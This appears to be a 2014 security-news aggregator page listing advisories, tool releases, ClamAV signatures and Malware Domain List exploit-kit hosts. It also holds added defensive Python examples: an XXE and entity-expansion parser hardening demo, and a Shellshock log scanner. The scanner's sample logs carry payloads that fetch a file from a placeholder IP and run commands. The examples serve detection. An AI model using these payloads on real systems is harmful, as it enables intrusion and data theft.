PLABS
Internet Storm Center Infocon Status
VMware security advisory: VMSA-2014-0010 http://www.vmware.com/security/advisories/VMSA-2014-0010.html, (Wed, Oct 1st)
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

ISC StormCast for Wednesday, October 1st 2014 http://isc.sans.edu/podcastdetail.html?id=4171, (Wed, Oct 1st)

DerbyCon highlights, (Tue, Sep 30th)
I had the pleasure of attending DerbyCon 4.0 (Family Rootz) this past Friday and Saturday and can tell you that if you haven't already attended yourself, pla…

ISC threat level returned to green - ShellShock message traffic subsiding, recommend focus on patching and monitoring, (Tue, Sep 30th)

ISC StormCast for Tuesday, September 30th 2014 http://isc.sans.edu/podcastdetail.html?id=4169, (Tue, Sep 30th)

Apple Released Update to Fix Shellshock Vulnerability http://support.apple.com/kb/DL1769, (Mon, Sep 29th)
--- Johannes B. Ullrich, Ph.D.

Packet Storm
Latest Security Tool Files
Tor-ramdisk i686 UClibc-based Linux Distribution x86 20140925
Tor-ramdisk is an i686 uClibc-based micro Linux distribution whose only purpose is to host a Tor server in an environment that maximizes security and privacy. Tor is a network…

Hakabana 0.2.1
Hakabana is an open source monitoring tool that helps you visualize network traffic using Haka and Kibana.

TOR Virtual Network Tunneling Tool 0.2.4.24
Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new comm…

IPTables Bash Completion 1.3
iptables-bash_completion provides programmable completion for the iptables and ip6tables programs from netfilter.org. Following the logic of iptables, options are shown only i…

IPSet List 3.2.1
ipset_list is a wrapper script for listing sets of the netfilter ipset program. It allows you to match and display sets, headers, and elements in various ways. Optionally, the…

I2P 0.9.15
I2P is an anonymizing network, offering a simple layer that identity-sensitive applications can use to securely communicate. All data is wrapped with several layers of encrypt…

Suricata IDPE 2.0.4
Suricata is a network intrusion detection and prevention engine developed by the Open Information Security Foundation and its supporting vendors. The engine is multi-threaded…

Lynis Auditing Tool 1.6.2
Lynis is an auditing tool for Unix (specialists). It scans the system and available software to detect security issues. Beside security related information it will also scan f…

Secure rm 1.2.14
Secure rm (srm) is a command-line compatible rm(1) which completely destroys file contents before unlinking. The goal is to provide drop-in security for users who wish to prev…


SecurityFocus
General Security Vulnerabilities
Vuln: Adobe Flash Player and AIR CVE-2014-0556 Unspecified Heap Based Buffer Overflow Vulnerability
Adobe Flash Player and AIR CVE-2014-0556 Unspecified Heap Based Buffer Overflow Vulnerability…

Vuln: HP MPIO DSM Manager CVE-2014-2639 Local Privilege Escalation Vulnerability
HP MPIO DSM Manager CVE-2014-2639 Local Privilege Escalation Vulnerability…

Vuln: libvirt XML External Entity CVE-2014-5177 Multiple Information Disclosure Vulnerabilities
libvirt XML External Entity CVE-2014-5177 Multiple Information Disclosure Vulnerabilities…

Vuln: libvirt XML Entity Expansion CVE-2014-0179 Information Disclosure Vulnerability
libvirt XML Entity Expansion CVE-2014-0179 Information Disclosure Vulnerability…
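The two libvirt entries above name the two classic XML-parser weaknesses, entity expansion and external entity (XXE) resolution, without showing what they look like. The following is an added example, not libvirt's code and not from SecurityFocus: it shows Python's default parser silently expanding a nested internal entity, then a parser built on `xml.parsers.expat` that refuses any DTD before an entity can be declared, so neither an expansion bomb nor a `SYSTEM` entity pointing at `/etc/passwd` gets a chance to run. The payloads and the libvirt-style `<domain>` document are constructed; `UnsafeXML`, `parse_untrusted_xml` and `rejects` are names chosen for this example.

```python
# Added example (not libvirt's code): the two XML-parser weaknesses named in
# the libvirt entries above, entity expansion and external entities, with
# Python's default parser beside a parser that refuses any DTD.
import xml.etree.ElementTree as ET
import xml.parsers.expat


class UnsafeXML(ValueError):
    """Raised when untrusted XML carries a DTD or entity declaration."""


# Constructed payloads. The first expands 3 levels x 10 = 1000 characters from
# a document of about 200 bytes; a real "billion laughs" bomb uses ~10 levels
# and exhausts memory. The second asks the parser to pull /etc/passwd into a node.
EXPANSION_XML = (
    '<!DOCTYPE d [<!ENTITY a "aaaaaaaaaa">'
    '<!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;">'
    '<!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">]><d>&c;</d>'
)
XXE_XML = (
    '<!DOCTYPE d [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    '<d>&xxe;</d>'
)
# Constructed document shaped like a libvirt domain definition.
BENIGN_XML = '<domain><name>vm1</name><memory unit="KiB">1048576</memory></domain>'


def expanded_text_length(data):
    """Default stdlib behaviour: internal entities are expanded silently."""
    return len(ET.fromstring(data).text or "")


def parse_untrusted_xml(data):
    """Parse XML with expat, raising UnsafeXML at the first DOCTYPE or entity
    declaration, so neither expansion bombs nor external entities get a chance.
    Returns a simple nested dict tree: {"tag", "attrs", "text", "children"}."""
    p = xml.parsers.expat.ParserCreate()
    p.buffer_text = True
    p.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)
    root = None
    stack = []

    def start_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML("DOCTYPE not allowed in untrusted input: %r" % name)

    def entity_decl(*args):
        raise UnsafeXML("entity declaration not allowed: %r" % (args[0],))

    def external_entity(context, base, sysid, pubid):
        # Belt and braces: never resolve anything outside the document.
        raise UnsafeXML("external entity reference refused: %r" % (sysid,))

    def start(tag, attrs):
        nonlocal root
        node = {"tag": tag, "attrs": attrs, "text": "", "children": []}
        if stack:
            stack[-1]["children"].append(node)
        else:
            root = node
        stack.append(node)

    def end(tag):
        stack.pop()

    def chars(text):
        if stack:
            stack[-1]["text"] += text

    p.StartDoctypeDeclHandler = start_doctype
    p.EntityDeclHandler = entity_decl
    p.ExternalEntityRefHandler = external_entity
    p.StartElementHandler = start
    p.EndElementHandler = end
    p.CharacterDataHandler = chars
    p.Parse(data, True)
    return root


def rejects(data):
    """True if the hardened parser refuses the document."""
    try:
        parse_untrusted_xml(data)
    except UnsafeXML:
        return True
    return False


if __name__ == "__main__":
    print("default parser expanded to", expanded_text_length(EXPANSION_XML), "chars")
    for name, doc in (("expansion", EXPANSION_XML), ("xxe", XXE_XML), ("benign", BENIGN_XML)):
        print(name, "rejected" if rejects(doc) else "parsed")
```

Refusing the DTD outright is the simplest policy for configuration input that never legitimately needs one; if a format does require a DOCTYPE, the same handlers can instead allow the declaration and reject only `SYSTEM`/`PUBLIC` entities and cap expansion depth.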

Bugtraq: Reflected Cross-Site Scripting (XSS) in Textpattern
Reflected Cross-Site Scripting (XSS) in Textpattern…

Bugtraq: Cross-Site Scripting (XSS) in Photo Gallery WordPress plugin
Cross-Site Scripting (XSS) in Photo Gallery WordPress plugin…

Bugtraq: [security bulletin] HPSBHF03119 rev.1 - HP DreamColor Display running Bash Shell, Remote Code Execution
[security bulletin] HPSBHF03119 rev.1 - HP DreamColor Display running Bash Shell, Remote Code Execution…


Helpful Stuff
DShield.org Recommended Block List
This list summarizes the top 20 attacking class C (/24) subnets over the last three days. The number of 'attacks' is the number of targets that reported scans from each subnet.
DShield.org Suspicious Domain List
GRC ShieldsUP!
Internet Vulnerability Profiling
Geo IP Location Service
This Geo IP Location service (IP address map lookup service) is provided free of charge by Geobytes, Inc. to assist you in locating the geographical location of an IP address.
IANA Port Number List
The port numbers are divided into three ranges: the Well Known Ports (0-1023), the Registered Ports (1024-49151), and the Dynamic and/or Private Ports (49152-65535).
InterNIC Whois Search
A query and response protocol that is widely used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block, or an autonomous system.
Nessus
Latest Nessus Plugins Released
FortiOS < 4.3.16 / 5.x < 5.0.8 Multiple Vulnerabilities (FG-IR-14-006)
Synopsis : The remote host is affected by multiple vulnerabilities. Description : The remote host is runnin…

Cisco Unified Communications Manager 'CTIManager' Vulnerability
Synopsis : The remote host is affected by an arbitrary command execution vulnerability. Description : The r…

GNU Bash Environment Variable Handling Code Injection via ProFTPD (Shellshock)
Synopsis : The remote FTP server is affected by a remote code execution vulnerability. Description : The re…

Squid 3.x < 3.3.13 / 3.4.7 Request Processing DoS
Synopsis : The remote proxy server is affected by a denial of service vulnerability. Description : Accordin…

Cisco IOS Software Network Address Translation (NAT) ALG Module DoS (cisco-sa-20140924-nat)
Synopsis : The remote device is missing a vendor-supplied security patch. Description : According to its se…

Sourcefire
Vulnerability Research Team
Shellshock - Update Bash Immediately!
Shellshock is a serious vulnerability. Bash, arguably the most widely distributed shell on Linux systems, fail…

Looking Glasses with Bacon
This is my first post on the VRT blog and I would like to introduce myself. I am Mariano Graziano, an Italian…

Microsoft Update Tuesday September 2014: another generally light month but with a significant IE bulletin
This month’s Microsoft Update Tuesday is pretty light save for the Internet Explorer bulletin. While there…

Malware Using the Registry to Store a Zeus Configuration File
This blog was co-authored by Andrea Allievi. A few weeks ago I came across a sample that was reading from…

Discovering Dynamically Loaded API in Visual Basic Binaries
Performing analysis on a Visual Basic (VB) script, or when Visual Basic is paired with the .NET Framework, bec…

RHEL
Red Hat Errata
RHBA-2014:1324-1: openstack-packstack and openstack-puppet-modules bug fix advisory
Red Hat Enterprise Linux: Updated openstack-packstack and openstack-puppet-modules packages for Packstack whi…

RHBA-2014:1325-1: Red Hat Enterprise Linux OpenStack Platform Bug Fix and Enhancement Advisory
Red Hat Enterprise Linux: Updated packages for Red Hat Enterprise Linux OpenStack Platform 5.0 (Icehouse) for…

RHBA-2014:1328-1: libcgroup bug fix update
Red Hat Enterprise Linux: Updated libcgroup packages that fix one bug are now available for Red Hat Enterpris…

RHBA-2014:1329-1: Red Hat OpenShift Enterprise 2.1 libcgroup bug fix update
Red Hat Enterprise Linux: Updated libcgroup packages are now available for Red Hat OpenShift Enterprise 2.1.

RHBA-2014:1330-1: Red Hat OpenShift Enterprise 2.0 libcgroup bug fix update
Red Hat Enterprise Linux: Updated libcgroup packages are now available for Red Hat OpenShift Enterprise 2.0.

RHBA-2014:1331-1: Red Hat OpenShift Enterprise 1.2 libcgroup bug fix update
Red Hat Enterprise Linux: Updated libcgroup packages are now available for Red Hat OpenShift Enterprise 1.2.

Microsoft
Security Advisories
2755801 - Update for Vulnerabilities in Adobe Flash Player in Internet Explorer - Version: 29.0
Revision Note: V29.0 (September 23, 2014): Added the 2999249 update to the Current Update section.Summary: Mic…

2871997 - Update to Improve Credentials Protection and Management - Version: 3.0
Revision Note: V3.0 (September 9, 2014): Rereleased advisory to announce the release of update 2982378 to prov…

2905247 - Insecure ASP.NET Site Configuration Could Allow Elevation of Privilege - Version: 2.0
Revision Note: V2.0 (September 9, 2014): Advisory rereleased to announce the offering of the security update v…

2915720 - Changes in Windows Authenticode Signature Verification - Version: 1.4
Revision Note: V1.4 (July 29, 2014): Revised advisory to announce that Microsoft no longer plans to enforce th…

2982792 - Improperly Issued Digital Certificates Could Allow Spoofing - Version: 2.0
Revision Note: V2.0 (July 17, 2014): Advisory revised to announce the availability of update 2982792 for suppo…

Cisco
Security Advisories
OSPF LSA Manipulation Vulnerability in Multiple Cisco Products
Multiple Cisco products are affected by a vulnerability involving the Open Shortest Path First (OSPF) Routing…

GNU Bash Environment Variable Command Injection Vulnerability
On September 24, 2014, a vulnerability in the Bash shell was publicly announced. The vulnerability is related…
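The Nessus ProFTPD plugin, the Sourcefire post and the Cisco advisory above all point at the same bug, and the ISC note recommends "patching and monitoring". The block below is an added example, not code from ISC, Sourcefire, Cisco or Tenable, covering both halves of that advice: it scans web-server access logs for the `() {` function-export prefix that a vulnerable bash executes when a CGI handler copies a header into the environment, and it runs the classic local check of exporting such a variable and seeing whether the trailing command fires. The log lines are constructed; `find_shellshock_probes` and `local_bash_vulnerable` are names chosen here.

```python
# Added example (not code from ISC, Sourcefire or Cisco): find Shellshock
# probes in web-server logs and run the classic local-bash check.
import re
import subprocess

# A vulnerable bash treats any environment variable whose value starts with
# "() {" as an exported function definition and keeps executing whatever
# follows the closing brace. That prefix is the signature to hunt for in
# anything a CGI handler copies into the environment (User-Agent, Referer,
# request line, cookies).
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Apache "combined" format:
#   ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample log lines (not real traffic): one probe in the
# User-Agent, one benign request, one probe in the Referer against a
# CGI path that does not exist.
SAMPLE_LOG = """\
203.0.113.10 - - [25/Sep/2014:10:01:12 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c 'wget http://198.51.100.7/x -O /tmp/x'"
203.0.113.11 - - [25/Sep/2014:10:01:13 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.12 - - [25/Sep/2014:10:02:44 +0000] "GET /cgi-bin/test.cgi HTTP/1.0" 404 209 "() { ignored; }; echo Content-Type: text/plain; echo; /usr/bin/id" "curl/7.37.0"
"""


def find_shellshock_probes(log_text):
    """Return one dict per log line carrying a Shellshock payload in the
    request line, Referer or User-Agent. A 200 against a real CGI path is
    the line to triage first; a 404 still tells you who is scanning."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for field in ("req", "referer", "ua"):
            if SHELLSHOCK_RE.search(m.group(field)):
                hits.append({"ip": m.group("ip"), "field": field,
                             "request": m.group("req"),
                             "status": int(m.group("status")),
                             "payload": m.group(field)})
                break
    return hits


def local_bash_vulnerable(bash="/bin/bash"):
    """The classic check: export a variable that looks like a function with a
    trailing command. Returns True if the trailing command ran (vulnerable),
    False if bash ignored it, None if bash could not be executed."""
    env = {"x": "() { :;}; echo VULNERABLE"}
    try:
        out = subprocess.run([bash, "-c", "echo probe"], env=env,
                             capture_output=True, text=True, timeout=5)
    except (OSError, subprocess.TimeoutExpired):
        return None
    return "VULNERABLE" in out.stdout


if __name__ == "__main__":
    for hit in find_shellshock_probes(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['field']:7} {hit['status']} {hit['request']!r} -> {hit['payload']!r}")
    print("local bash vulnerable:", local_bash_vulnerable())
```

The log check only sees what the web server logged; probes aimed at other bash-backed services (the ProFTPD case above, DHCP clients, SSH forced commands) need the same pattern applied to those services' own logs. The local check covers the original bug only; the follow-on CVEs fixed in later bash releases need the vendor's package version, not this probe, as the source of truth.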

Apache Struts 2 Command Execution Vulnerability in Multiple Cisco Products
Multiple Cisco products include an implementation of the Apache Struts 2 component that is affected by a remot…

Cisco IOS Software RSVP Vulnerability
A vulnerability in the implementation of the Resource Reservation Protocol (RSVP) in Cisco IOS Software and Ci…

Cisco IOS Software DHCP Version 6 Denial of Service Vulnerability
A vulnerability in the DHCP version 6 (DHCPv6) server implementation of Cisco IOS Software and Cisco IOS XE So…

Cisco IOS Software Network Address Translation Denial of Service Vulnerability
A vulnerability in the Network Address Translation (NAT) feature of Cisco IOS Software could allow an unauthen…

Multiple Vulnerabilities in Cisco IOS Software Multicast Domain Name System
The Cisco IOS Software implementation of the multicast Domain Name System (mDNS) feature contains the followin…

ClamAV
Top 10 ClamAV Official Signatures
Suspect.DoubleExtension-zippwd-15
Count: 18895…
W32.Virut.Gen.D-163
Count: 12179…
Heuristics.Safebrowsing.Suspected-malware_safebrowsing.clamav.net
Count: 7110…
Heuristics.Phishing.Email.SpoofedDomain
Count: 6804…
Heuristics.Phishing.Email.SSL-Spoof
Count: 5072…
Heuristics.Safebrowsing.Suspected-phishing_safebrowsing.clamav.net
Count: 4508…
Worm.Mydoom.I
Count: 4167…
PUA.Script.PDF.EmbeddedJS-1
Count: 3669…
HTML.Phishing.Card-52
Count: 3614…
Malware Domain List
aveconomic.trailswest.org:15106 (2014/10/01_09:30)
Host: aveconomic.trailswest.org:15106/haddan_files/stories.php, IP address: 87.118.127.230, ASN: 31103, Country: DE, Description: exploit kit…

avecat.missouritheatre.org:15106 (2014/10/01_09:30)
Host: avecat.missouritheatre.org:15106/full/cnstats/clients/stories.php?wink=322, IP address: 87.118.127.230, ASN: 31103, Country: DE, Description: exploit kit…

radiology.starlightcapitaladvisors.net (2014/10/01_09:34)
Host: radiology.starlightcapitaladvisors.net/dr/southeast/steve/dropdown.js, IP address: 85.10.229.207, ASN: 24940, Country: DE, Description: obfuscated script leads to exploit kit…

qwe.affairedhonneur.us (2014/09/17_10:11)
Host: qwe.affairedhonneur.us/depqfie59y, IP address: 192.99.197.131, ASN: 16276, Country: CA, Description: exploit kit…

asd.vicentelopez.us (2014/09/17_10:11)
Host: asd.vicentelopez.us/vbign3s2pe, IP address: 192.99.197.133, ASN: 16276, Country: CA, Description: exploit kit…

borneo.aqq79.com (2014/09/17_10:11)
Host: borneo.aqq79.com/wbxx3.html, IP address: 217.23.5.88, ASN: 49981, Country: NL, Description: frame leads to exploit kit…

optilogus.com (2014/09/16_09:59)
Host: optilogus.com/twmfizdfmu/lteqwxftti.html, IP address: 192.185.17.123, ASN: 20013, Country: US, Description: Compromised site (Sage malspam campaign), leads to Upatre…

flashsavant.com (2014/09/16_09:59)
Host: flashsavant.com/cqavunntfg/kuldytebws.html, IP address: 74.91.152.2, ASN: 32392, Country: US, Description: Compromised site (Sage malspam campaign), leads to Upatre…

becomedebtfree.com.au (2014/09/16_09:59)
Host: becomedebtfree.com.au/ttlnlmwbox/ctinpfgeob.html, IP address: 198.57.194.65, ASN: 46606, Country: US, Description: Compromised site (Sage malspam campaign), leads to Upatre…
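The Malware Domain List entries above carry three indicator types each (full URL, host name, hosting IP), and they are not equally strong: two entries share 87.118.127.230, so an IP-only match will also flag every innocent virtual host on that address. The block below is an added example, not Malware Domain List's or Procyon Labs' code: it parses the entry lines exactly as they appear on this page into indicators and runs them over Squid native-format proxy log lines, reporting the most specific match found. The proxy log lines are constructed; `parse_mdl`, `url_key` and `match_proxy_log` are names chosen here.

```python
# Added example (not code from Malware Domain List or Procyon Labs): turn the
# MDL entries into indicators and run them over Squid proxy logs.
import re
from urllib.parse import urlsplit

# Entries copied from the Malware Domain List section of this page.
MDL_ENTRIES = """\
Host: aveconomic.trailswest.org:15106/haddan_files/stories.php, IP address: 87.118.127.230, ASN: 31103, Country: DE, Description: exploit kit
Host: avecat.missouritheatre.org:15106/full/cnstats/clients/stories.php?wink=322, IP address: 87.118.127.230, ASN: 31103, Country: DE, Description: exploit kit
Host: radiology.starlightcapitaladvisors.net/dr/southeast/steve/dropdown.js, IP address: 85.10.229.207, ASN: 24940, Country: DE, Description: obfuscated script leads to exploit kit
Host: qwe.affairedhonneur.us/depqfie59y, IP address: 192.99.197.131, ASN: 16276, Country: CA, Description: exploit kit
Host: optilogus.com/twmfizdfmu/lteqwxftti.html, IP address: 192.185.17.123, ASN: 20013, Country: US, Description: Compromised site (Sage malspam campaign), leads to Upatre
"""

ENTRY_RE = re.compile(
    r"^Host: (?P<url>\S+), IP address: (?P<ip>[\d.]+), ASN: (?P<asn>\d+), "
    r"Country: (?P<cc>[A-Z]{2}), Description: (?P<desc>.*)$"
)

# Constructed Squid native access.log lines (not real traffic):
#   time elapsed client code/status bytes method URL ident peer/host type
SAMPLE_PROXY_LOG = """\
1412155812.114    312 10.0.0.5 TCP_MISS/200 1843 GET http://aveconomic.trailswest.org:15106/haddan_files/stories.php - DIRECT/87.118.127.230 text/html
1412155813.201     41 10.0.0.9 TCP_MISS/200 9210 GET http://www.example.com/ - DIRECT/93.184.216.34 text/html
1412155820.877    150 10.0.0.7 TCP_MISS/200 3310 GET http://qwe.affairedhonneur.us/landing?id=7 - DIRECT/192.99.197.131 text/html
1412155831.005     88 10.0.0.8 TCP_MISS/200 2120 GET http://some-other-vhost.example.net/index.html - DIRECT/87.118.127.230 text/html
"""


def url_key(url):
    """Normalise to host[:port] + path: lowercase host, scheme and query dropped,
    so an MDL entry and a logged URL compare the same way."""
    if "://" not in url:
        url = "http://" + url
    u = urlsplit(url)
    return u.netloc.lower() + (u.path or "/")


def parse_mdl(text):
    """Build {urls, hosts, ips} indicator maps from MDL entry lines."""
    ind = {"urls": {}, "hosts": {}, "ips": {}}
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue
        desc = m.group("desc")
        key = url_key(m.group("url"))
        host = key.split("/", 1)[0].split(":")[0]
        ind["urls"][key] = desc
        ind["hosts"][host] = desc
        ind["ips"].setdefault(m.group("ip"), []).append(desc)
    return ind


def match_proxy_log(log_text, ind):
    """Most specific indicator wins: full URL, then host, then destination IP."""
    alerts = []
    for line in log_text.splitlines():
        f = line.split()
        if len(f) < 9:
            continue
        client, url, peer = f[2], f[6], f[8]
        key = url_key(url)
        host = key.split("/", 1)[0].split(":")[0]
        dst_ip = peer.partition("/")[2]
        if key in ind["urls"]:
            alerts.append({"client": client, "match": "url", "indicator": key,
                           "desc": ind["urls"][key]})
        elif host in ind["hosts"]:
            alerts.append({"client": client, "match": "host", "indicator": host,
                           "desc": ind["hosts"][host]})
        elif dst_ip in ind["ips"]:
            # Weakest signal: the two 87.118.127.230 entries show one address
            # serving several malicious names, but shared hosting also puts
            # innocent sites behind it. Queue for review rather than block.
            alerts.append({"client": client, "match": "ip", "indicator": dst_ip,
                           "desc": "; ".join(ind["ips"][dst_ip])})
    return alerts


if __name__ == "__main__":
    indicators = parse_mdl(MDL_ENTRIES)
    for a in match_proxy_log(SAMPLE_PROXY_LOG, indicators):
        print(f"{a['client']:10} {a['match']:4} {a['indicator']}  ({a['desc']})")
```

The non-standard port 15106 is part of the URL key, so an entry on that port does not match traffic to the same host on port 80; drop the port from `url_key` if the feed you consume is less specific than the one shown here.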


© 2014 Procyon Labs / Randal T. Rioux